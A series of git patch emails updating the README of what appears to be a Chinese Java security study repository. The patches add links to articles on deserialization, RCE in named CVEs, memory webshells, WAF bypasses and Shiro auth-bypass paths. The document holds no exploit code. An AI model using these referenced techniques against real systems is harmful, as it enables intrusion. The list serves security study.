Dec 2023 02:01:01 +0800 Subject: [PATCH 39/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新2023补天白帽大会议题 --- README.md | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 857f92a..bb548da 100644 --- a/README.md +++ b/README.md @@ -439,15 +439,17 @@ - [网上看到的Jetty的部分解析特性(支持%uxxx)](https://www.wangan.com/p/7fyg8k2c7781675a) - ## 19.ASM与JVM学习 -- [目前看到关于ASM框架最详细的学习教程](https://lsieun.github.io/java/asm/) + - [JAVA虚拟机执行模型(关注引入了栈映射帧,用于加快虚拟机中类验证过程的速度)](https://www.cnblogs.com/coding-way/p/6600647.html) - [What is a stack map frame](https://stackoverflow.com/questions/25109942/what-is-a-stack-map-frame) - 这里比较有意思的是:Java 1.7引入了此选项以加速类验证。框架分为两部分:变量类型和堆栈类型。第一帧由方法类型描述。在每个GOTO / JUMP调用之后,您需要提供堆栈映射框架的更新描述。为了节省空间,可以使用SAME,APPEND等选项,也可以通过指定变量类型的FULL数组再次描述所有变量。 - [为什么JVM需要DUP指令](https://www.cnblogs.com/clayjj/p/7698035.html) +## 20.议题 +- [Hacking FernFlower](https://y4tacker.github.io/2023/12/22/year/2023/12/Hacking-FernFlower/) + ## 其他分享 From 7b3210f822128a65dbd04a399ffce86d87e7c195 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 27 Dec 2023 22:40:13 +0800 Subject: [PATCH 40/72] Update README.md --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index bb548da..6b33142 100644 --- a/README.md +++ b/README.md @@ -373,6 +373,9 @@ - [Apache Airflow: Bypass permission verification to view task instances of other dags(CVE-2023-42663)](https://hackerone.com/reports/2208656) - [Apache Jackrabbit RMI 远程代码执行漏洞分析(CVE-2023-37895)(这个漏洞适合了解RMI攻击的基础)](https://xz.aliyun.com/t/13118) - [Apache ActiveMQ Jolokia远程代码执行不依赖JDK打法](https://y4tacker.github.io/2023/11/30/year/2023/11/Apache-ActiveMQ-Jolokia%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E4%B8%8D%E4%BE%9D%E8%B5%96JDK%E6%89%93%E6%B3%95/) + - Apache OFBiz + - [Apache OFBiz漏洞 CVE-2023-49070 的前世今生(非常详细)](https://mp.weixin.qq.com/s/iAvitO6otPdHSu1SjRNX3g) + - [Apache OFBiz未授权命令执行浅析(CVE-2023-51467)](https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/) - Oracle - [Oracle E-Business Suite Unauthenticated RCE](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-21587/index.md) - [Exploiting an Order of Operations Bug to Achieve RCE in Oracle Opera](https://blog.assetnote.io/2023/04/30/rce-oracle-opera/) From 99d8e846427c22efadd5c4c8d1c19db8eba17427 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 28 Dec 2023 09:34:53 +0800 Subject: [PATCH 41/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 6b33142..8171c92 100644 --- a/README.md +++ b/README.md @@ -385,7 +385,7 @@ - Nacos - [Aliababa Nacos hessian JRaft反序列化(文章里提到的只能打一次有误,后经过研究可以打多次)](https://y4er.com/posts/nacos-hessian-rce/ ) - - [Nacos 多次打非完全体方案(这人也没完全考虑到容错,但是网上暂时只有这人的,实际上在构建WriteRequest缺少setOperation)(慎用!别把别人打崩了!)](https://github.com/c0olw/NacosRce) + - [Nacos 多次打非完美方案(这人也没完全考虑到容错,但是网上暂时只有这人的,实际上在构建WriteRequest缺少setOperation)(慎用!别把别人打崩了!)](https://github.com/c0olw/NacosRce) - Adobe - [CVE-2023-29298: Adobe ColdFusion Access Control Bypass](https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/) From 88f23665f74361d42a42c527ed8866ae214f666f Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 8 Jan 2024 18:43:08 +0800 Subject: [PATCH 42/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 8171c92..a6186c1 100644 --- a/README.md +++ b/README.md @@ -367,6 +367,7 @@ - [Apache Commons JXPath 远程代码执行](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-41852/index.md) - [Apache Commons Text 远程代码执行](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-42889/index.md) - [Log4j2-RCE分析](http://blog.gm7.org/%E4%B8%AA%E4%BA%BA%E7%9F%A5%E8%AF%86%E5%BA%93/02.%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/01.Java%E5%AE%89%E5%85%A8/03.%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/06.log4j2_rce%E5%88%86%E6%9E%90.html#%E5%A4%8D%E7%8E%B0) + - [Log4j2不出网检测(靠类型转换、危害有限思路值得学习)](https://cloud.tencent.com/developer/article/2036012) - [Apache Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?__biz=MzkyNDA5NjgyMg==&mid=2247495227&idx=1&sn=5ab9bcc3d89d57ff9799f88c3363814c&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1&scene=1&srcid=0325kmXWImZrXe0btPMEsJDY&sharer_sharetime=1679735505328&sharer_shareid=19374164c9d8647c6159e09a97bb1208#rd) - [Apache Dubbo 反序列化漏洞(CVE-2023-23638)分析及利用探索](https://yyhylh.github.io/2023/04/08/Apache%20dubbo%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%EF%BC%88CVE-2023-23638%EF%BC%89%E5%88%86%E6%9E%90%E5%8F%8A%E5%88%A9%E7%94%A8%E6%8E%A2%E7%B4%A2/) - [Apache Dubbo反序列化漏洞(CVE-2023-23638)完整利用及工程化实践](https://yyhylh.github.io/2023/05/11/Apache%20Dubbo%20%EF%BC%88CVE-2023-23638%EF%BC%89%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8%E5%8F%8A%E5%B7%A5%E7%A8%8B%E5%8C%96%E5%AE%9E%E8%B7%B5/) From 244b858e9ee92f6717570aa8914d1a4cd05976ed Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 10 Jan 2024 10:28:59 +0800 Subject: [PATCH 43/72] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a6186c1..94bdbd0 100644 --- a/README.md +++ b/README.md @@ -403,7 +403,7 @@ - [JetBrains TeamCity 任意代码执行漏洞分析(CVE-2023-42793)](https://forum.butian.net/share/2514) - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) - + - [MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞)](https://y4tacker.github.io/2023/12/28/year/2023/12/%E5%8F%88%E5%8F%88%E5%8F%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%B1%9E%E6%80%A7%E8%A6%86%E7%9B%96%E5%B8%A6%E6%9D%A5%E7%9A%84%E6%BC%8F%E6%B4%9E/) From 14492e007dbb5c057b5d303a51935ee2609ee7f8 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Wed, 10 Jan 2024 10:30:41 +0800 Subject: [PATCH 44/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞) --- README.md | 23 +---------------------- 1 file changed, 1 insertion(+), 22 deletions(-) diff --git a/README.md b/README.md index 94bdbd0..fd0f299 100644 --- a/README.md +++ b/README.md @@ -278,36 +278,23 @@ ## 11.Spring - [浅谈SpringWeb请求解析过程(很不错的文章把低版本一些绕过的特性基本都提到了)](https://forum.butian.net/share/2214) - [浅谈Spring与安全约束SecurityConstraint](https://forum.butian.net/index.php/share/2283) - - [SpirngBoot下结合Tomcat实现无OOB方式下的回显](https://github.com/Y4tacker/JavaSec/blob/main/5.%E5%86%85%E5%AD%98%E9%A9%AC%E5%AD%A6%E4%B9%A0/Spring/springboot-tomcat%E5%9B%9E%E6%98%BE/index.md) - - [低版本SpringBoot-SpEL表达式注入漏洞复现分析](https://y4tacker.github.io/2022/02/07/year/2022/2/%E4%BD%8E%E7%89%88%E6%9C%ACSpringBoot-SpEL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%E5%88%86%E6%9E%90/) - - [SpringCloud-SnakeYAML-RCE(高版本不可用)](https://y4tacker.github.io/2022/02/08/year/2022/2/SpringCloud-SnakeYAML-RCE/) - - [Spring Boot Vulnerability Exploit Check List](https://github.com/LandGrey/SpringBootVulExploit) - - [SSRF to Rce with Jolokia and Mbeans](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/SSRF%20to%20RCE%20with%20Jolokia%20and%20MBeans%20%E2%80%A2%20Think%20Love%20Share.pdf) - - [CVE-2022-22947 SpringCloudGateWay 远程代码执行](https://github.com/Y4tacker/JavaSec/blob/main/11.Spring/CVE-2022-22947%20SpringCloudGateWay%20%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/index.md) - - [Spring Cloud Function-SPEL(利用面不大)](https://hosch3n.github.io/2022/03/26/SpringCloudFunction%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/) - - [SpringMVC框架任意代码执行漏洞(CVE-2010-1622)分析](http://rui0.cn/archives/1158) - - [Spring Beans RCE分析(CVE-2022-22965)(我还是喜欢叫Spring4shell,自己懒得写了,这篇还可以,稍微注意下AccessLogValve这个类WBS)](https://xz.aliyun.com/t/11129) - - [Spring Data MongoDB SpEL表达式注入(CVE-2022-22980)(能看但是有些逻辑还是讲得很混乱总体而已还是好的作为参考即可)](https://xz.aliyun.com/t/11484) - - [SpringBoot全局注册Filter过滤XSS](https://github.com/Y4tacker/JavaSec/blob/main/11.Spring/SpringBoot%E5%85%A8%E5%B1%80%E6%B3%A8%E5%86%8CFilter%E8%BF%87%E6%BB%A4XSS/index.md) - - [Springboot devtools反序列化(难点在于secret的获取,当然比如有actuator端点暴露情况下就会变得容易)](https://novysodope.github.io/2022/05/11/77/) - [浅谈Spring中的Controller参数的验证机制(注意Hibernate Validator的正确配置)](https://forum.butian.net/share/2538) ## 12.Shiro - [Shiro RememberMe 漏洞检测的探索之路(长亭的一些总结非常不错)](https://stack.chaitin.com/techblog/detail?id=39) - - [Shiro另类检测方式](http://www.lmxspace.com/2020/08/24/%E4%B8%80%E7%A7%8D%E5%8F%A6%E7%B1%BB%E7%9A%84shiro%E6%A3%80%E6%B5%8B%E6%96%B9%E5%BC%8F/) - [浅谈Shiro执行任意反序列化gadget的方案](https://github.com/Y4tacker/JavaSec/blob/main/12.Shiro/%E6%B5%85%E8%B0%88Shiro%E6%89%A7%E8%A1%8C%E4%BB%BB%E6%84%8F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96gadget%E7%9A%84%E6%96%B9%E6%A1%88/index.md) - [CVE-2010-3863权限绕过(通过/./admin绕过/admin,/abc/../admin)](https://github.com/Y4tacker/JavaSec/blob/main/12.Shiro/CVE-2010-3863%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87/index.md) @@ -321,7 +308,7 @@ - [CVE-2020-13933特殊场景权限绕过(通过/unauthorize/%3b)](https://github.com/Y4tacker/JavaSec/blob/main/12.Shiro/CVE-2020-13933%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87/index.md) - [SpringBoot2.3.0下Shiro<=1.5.1权限绕过(通过/aa;/%2e%2e/unauthorize绕过对/unauthorize拦截,当然也可以不用目录穿越/;y4tacker/unauthorize也可以)](https://github.com/Y4tacker/JavaSec/tree/main/11.Spring/SpringBoot2.3.0%E4%B8%8BShiro%3C%3D1.5.1%E6%9D%83%E9%99%90%E7%BB%95%E8%BF%87) - [Spring-Shiro1.5.2 Bypass(通过/unauthorize/a%252Fa绕过对/unauthorize/*的权限限制)](https://github.com/Y4tacker/JavaSec/blob/main/12.Shiro/Spring-Shiro1.5.2%20Bypass/index.md) -- [记一次 Shiro 的实战利用(突破限制shiro 550利用payload的长度,这种方式不能很好对抗检测文件落地,其实也可以配合上下文一些无害属性多次set写入加载)](https://mp.weixin.qq.com/s/w9sMhMrCy1pofOV-h94qbQ) +- [记一次 Shiro 的实战利用(突破限制shiro 550利用payload的长度,这种方式不能很好对抗检测文件落地,其实也可以配合上下文一些无害属性多次set写入加载)](https://mp.weixin.qq.com/s/w9sMhMrCy1pofOV-h94qbQ) @@ -335,7 +322,6 @@ - [半自动化挖掘request实现多种中间件回显](https://gv7.me/articles/2020/semi-automatic-mining-request-implements-multiple-middleware-echo/) - ## 14. JSPWebshell - [JSP-Webshells集合(三梦的总结挺全面的利用点)](https://github.com/threedr3am/JSP-Webshells) @@ -344,11 +330,9 @@ - [JspWebshell编码混淆篇(unicode和html实体编码那些就懒得写了技术性不强)](https://y4tacker.github.io/2022/11/27/year/2022/11/%E6%B5%85%E8%B0%88JspWebshell%E4%B9%8B%E7%BC%96%E7%A0%81/) - ## 15.Waf - [Java文件上传大杀器-绕waf(针对commons-fileupload组件)](https://y4tacker.github.io/2022/02/25/year/2022/2/Java%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%A4%A7%E6%9D%80%E5%99%A8-%E7%BB%95waf(%E9%92%88%E5%AF%B9commons-fileupload%E7%BB%84%E4%BB%B6)/) - - [探寻Java文件上传流量层面waf绕过姿势系列一](https://y4tacker.github.io/2022/06/19/year/2022/6/%E6%8E%A2%E5%AF%BBTomcat%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%B5%81%E9%87%8F%E5%B1%82%E9%9D%A2%E7%BB%95waf%E6%96%B0%E5%A7%BF%E5%8A%BF/) - [探寻Java文件上传流量层面waf绕过姿势系列二](https://y4tacker.github.io/2022/06/21/year/2022/6/%E6%8E%A2%E5%AF%BBJava%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%B5%81%E9%87%8F%E5%B1%82%E9%9D%A2waf%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF%E7%B3%BB%E5%88%97%E4%BA%8C/) - [Java反序列化数据绕WAF之加大量脏数据 | 回忆飘如雪 (gv7.me)](https://gv7.me/articles/2021/java-deserialize-data-bypass-waf-by-adding-a-lot-of-dirty-data/) @@ -357,11 +341,9 @@ - [RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass](https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/) - ## 16.漏洞复现 - Apache - - [Apache Commons Configuration 远程代码执行(虽然是配置文件RCE但也有学习意义)](https://xz.aliyun.com/t/11527) - [Apache Spark shell command injection vulnerability via Spark UI(之前很早前在我的各个知识星球分享了)](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-33891/index.md) - [Apache Commons JXPath 远程代码执行](https://github.com/Y4tacker/JavaSec/blob/main/16.%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/CVE-2022-41852/index.md) @@ -384,16 +366,13 @@ - Spring - [Spring-Kafka-POC-CVE-2023-34040](https://github.com/Contrast-Security-OSS/Spring-Kafka-POC-CVE-2023-34040) - Nacos - - [Aliababa Nacos hessian JRaft反序列化(文章里提到的只能打一次有误,后经过研究可以打多次)](https://y4er.com/posts/nacos-hessian-rce/ ) - [Nacos 多次打非完美方案(这人也没完全考虑到容错,但是网上暂时只有这人的,实际上在构建WriteRequest缺少setOperation)(慎用!别把别人打崩了!)](https://github.com/c0olw/NacosRce) - - Adobe - [CVE-2023-29298: Adobe ColdFusion Access Control Bypass](https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/) - [Analysis CVE-2023-29300: Adobe ColdFusion Pre-Auth RCE](https://blog.projectdiscovery.io/adobe-coldfusion-rce/) - Smartbi - [浅析Smartbi逻辑漏洞](https://y4tacker.github.io/2023/07/05/year/2023/7/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/) - - Others - [HtmlUnit-RCE](https://siebene.github.io/2022/12/30/HtmlUnit-RCE/) - [openfire鉴权绕过漏洞原理解析(主要是学习jetty对%u002e请求的解析支持)](https://mp.weixin.qq.com/s/EzfB8CM4y4aNtKFJqSOM1w) From 49c22b0ce9e356b90f6916b01b5c8f0d3d99c932 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 22 Jan 2024 17:35:54 +0800 Subject: [PATCH 45/72] Update README.md Atlassian Confluence-Remote Code Execution(CVE-2023-22527) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index fd0f299..784b9f5 100644 --- a/README.md +++ b/README.md @@ -383,7 +383,7 @@ - [SysAid On-Prem Software(CVE-2023-47246)](https://forum.butian.net/share/2577) - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) - [MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞)](https://y4tacker.github.io/2023/12/28/year/2023/12/%E5%8F%88%E5%8F%88%E5%8F%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%B1%9E%E6%80%A7%E8%A6%86%E7%9B%96%E5%B8%A6%E6%9D%A5%E7%9A%84%E6%BC%8F%E6%B4%9E/) - + - [Atlassian Confluence-Remote Code Execution(CVE-2023-22527)](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/) ## 17.模板引擎+表达式相关 From 9c248bdb99bc303813c550d05b42654bb2b6ae05 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 29 Jan 2024 10:26:49 +0800 Subject: [PATCH 46/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Jenkins文件读取漏洞拾遗(CVE-2024-23897) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 784b9f5..885302d 100644 --- a/README.md +++ b/README.md @@ -384,6 +384,7 @@ - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) - [MCMS属性覆盖全版本Bypass分析(又又又是一个属性覆盖带来的漏洞)](https://y4tacker.github.io/2023/12/28/year/2023/12/%E5%8F%88%E5%8F%88%E5%8F%88%E6%98%AF%E4%B8%80%E4%B8%AA%E5%B1%9E%E6%80%A7%E8%A6%86%E7%9B%96%E5%B8%A6%E6%9D%A5%E7%9A%84%E6%BC%8F%E6%B4%9E/) - [Atlassian Confluence-Remote Code Execution(CVE-2023-22527)](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/) + - [Jenkins文件读取漏洞拾遗(CVE-2024-23897)](https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html) ## 17.模板引擎+表达式相关 From e3286edb907fc22b95e7c98221f26bc66946de0c Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 26 Feb 2024 16:48:25 +0800 Subject: [PATCH 47/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit UTF-8 Overlong Encoding导致的安全问题 --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 885302d..5d50e0a 100644 --- a/README.md +++ b/README.md @@ -76,6 +76,7 @@ - [JDK7u21](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/JDK7u21/index.md) - [AspectJWeaver写文件](https://github.com/Y4tacker/JavaSec/blob/main/2.反序列化专区/AspectJWeaver/AspectJWeaver.md) - [反序列化在渗透测试当中值得关注的点](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%BD%93%E4%B8%AD%E5%80%BC%E5%BE%97%E5%85%B3%E6%B3%A8%E7%9A%84%E7%82%B9/index.md) +- [UTF-8 Overlong Encoding导致的安全问题(在绕过流量设备上非常有帮助)](https://mp.weixin.qq.com/s/fcuKNfLXiFxWrIYQPq7OCg) - [构造java探测class反序列化gadget](https://mp.weixin.qq.com/s/KncxkSIZ7HVXZ0iNAX8xPA) - [对URLDNS探测class的补充(为什么本地明明没有这个类却有"DNS解析")](https://github.com/Y4tacker/JavaSec/blob/main/2.%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%93%E5%8C%BA/URLDNS%E6%8E%A2%E6%B5%8Bclass%E7%9A%84%E8%A1%A5%E5%85%85/index.md) - [利用Swing构造反序列化SSRF/RCE(JDK CVE-2023-21939)](https://github.com/Y4Sec-Team/CVE-2023-21939) From 53657f19e2f9426026c0ccf07ce127a708d0d635 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 5 Mar 2024 16:16:47 +0800 Subject: [PATCH 48/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 5d50e0a..e45eb19 100644 --- a/README.md +++ b/README.md @@ -39,6 +39,7 @@ - [JEP290基础概念](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/JEP290%E7%9A%84%E5%9F%BA%E6%9C%AC%E6%A6%82%E5%BF%B5/index.md) - [Java中的XXE](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/Java%E4%B8%AD%E7%9A%84XXE/index.md) - [XML外部实体注入(XXE)攻击方式汇总(关于XXE可以延伸继续看看)](https://tttang.com/archive/1813/) + - [绕过WAF保护的XXE(一些通用的流量混淆方式)](https://xz.aliyun.com/t/4059?accounttraceid=04ba92e87b2342b9a14daca5812cc52aoxob&time__1311=n4mx0DnDBiitiQo4GNulxU2nD9iBDc70ZAnYD) - [通过反射扫描被注解修饰的类](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/%E9%80%9A%E8%BF%87%E5%8F%8D%E5%B0%84%E6%89%AB%E6%8F%8F%E8%A2%AB%E6%B3%A8%E8%A7%A3%E4%BF%AE%E9%A5%B0%E7%9A%84%E7%B1%BB/index.md) - [低版本下Java文件系统00截断](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E4%BD%8E%E7%89%88%E6%9C%AC%E4%B8%8BJava%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F00%E6%88%AA%E6%96%AD/index.md) - [有趣的XSS之Normalize](https://github.com/Y4tacker/JavaSec/blob/main/1.%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/%E6%9C%89%E8%B6%A3%E7%9A%84XSS%E4%B9%8BNormalize/index.md) From fa08334b04ce09b19397e87b70134d2df6514eba Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Sun, 24 Mar 2024 20:31:20 +0800 Subject: [PATCH 49/72] Update README.md --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index e45eb19..b33d7cf 100644 --- a/README.md +++ b/README.md @@ -435,6 +435,7 @@ ## 20.议题 - [Hacking FernFlower](https://y4tacker.github.io/2023/12/22/year/2023/12/Hacking-FernFlower/) + - [议题相关代码](https://github.com/Y4tacker/HackingFernFlower) From a99fcfe38e114bedcccdb36d43e0ce6883722559 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Tue, 26 Mar 2024 09:51:45 +0800 Subject: [PATCH 50/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新帆软channel接口反序列化漏洞分析(二次反序列化一些实战场景利用) --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index b33d7cf..b812beb 100644 --- a/README.md +++ b/README.md @@ -461,6 +461,7 @@ - [Java Web —— 从内存中Dump JDBC数据库明文密码(还挺好玩的)](https://mp.weixin.qq.com/s/QCfqO2BJuhSOr58rldZzxA) - [如何带依赖打包Jar](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/Maven/index.md) - [一些Java二次反序列化的点(持续收集)](https://github.com/Y4tacker/JavaSec/blob/main/%E5%85%B6%E4%BB%96/Java%E4%BA%8C%E6%AC%A1%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/Java%E8%A7%A6%E5%8F%91%E4%BA%8C%E6%AC%A1%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E7%82%B9.md) + - [帆软channel接口反序列化漏洞分析(二次反序列化一些实战场景利用)](https://forum.butian.net/share/2806) - [自己写的OpenRasp分析](https://y4tacker.github.io/2022/05/28/year/2022/5/OpenRasp%E5%88%86%E6%9E%90/) - [Apache Unomi 表达式注入攻防](https://github.com/1135/unomi_exploit) - [JEXL3表达式注入](https://xz.aliyun.com/t/8099) From 8c84ea3ac77190fd83d4de5b954e63679243a023 Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Mon, 1 Apr 2024 18:39:07 +0800 Subject: [PATCH 51/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新“Java安全攻防之Spring Cloud Gateway攻击Redis” --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index b812beb..13b1ed7 100644 --- a/README.md +++ b/README.md @@ -189,6 +189,7 @@ - [看不见的 Jsp-WebShell 第二式增强之无痕](https://mp.weixin.qq.com/s/7b3Fyu_K6ZRgKlp6RkdYoA) - [Spring cloud gateway通过SPEL注入内存马](https://gv7.me/articles/2022/the-spring-cloud-gateway-inject-memshell-through-spel-expressions/) + - [Java安全攻防之Spring Cloud Gateway攻击Redis](https://mp.weixin.qq.com/s/6U1KaLrrtq2dxg55IYASFg) - Tools From 35c6418f32ac5224ae5f6ab8c9ad45150752f4af Mon Sep 17 00:00:00 2001 From: Y4tacker <56486273+Y4tacker@users.noreply.github.com> Date: Thu, 9 May 2024 13:58:55 +0800 Subject: [PATCH 52/72] Update README.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 更新整理CrushFTP漏洞 --- README.md | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 13b1ed7..913949f 100644 --- a/README.md +++ b/README.md @@ -375,7 +375,12 @@ - [CVE-2023-29298: Adobe ColdFusion Access Control Bypass](https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/) - [Analysis CVE-2023-29300: Adobe ColdFusion Pre-Auth RCE](https://blog.projectdiscovery.io/adobe-coldfusion-rce/) - Smartbi - - [浅析Smartbi逻辑漏洞](https://y4tacker.github.io/2023/07/05/year/2023/7/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/) + - [浅析Smartbi逻辑漏洞](https://y4tacker.github.io/2023/07/05/year/2023/7/%E6%B5%85%E6%9E%90Smartbi%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/) +- CrushFTP + - [CrushFTP Unauthenticated Remote Code Execution(CVE-2023-43177)](https://y4tacker.github.io/2023/12/10/year/2023/12/CrushFTP-Unauthenticated-Remote-Code-Execution-CVE-2023-43177/) + - [浅析CrushFTP之VFS逃逸](https://y4tacker.github.io/2024/04/23/year/2024/4/%E6%B5%85%E6%9E%90CrushFTP%E4%B9%8BVFS%E9%80%83%E9%80%B8/) + - [CrushFTP Unauthenticated Remote Code Execution(CVE-2024-4040)](https://attackerkb.com/topics/20oYjlmfXa/cve-2024-4040/rapid7-analysis) + - 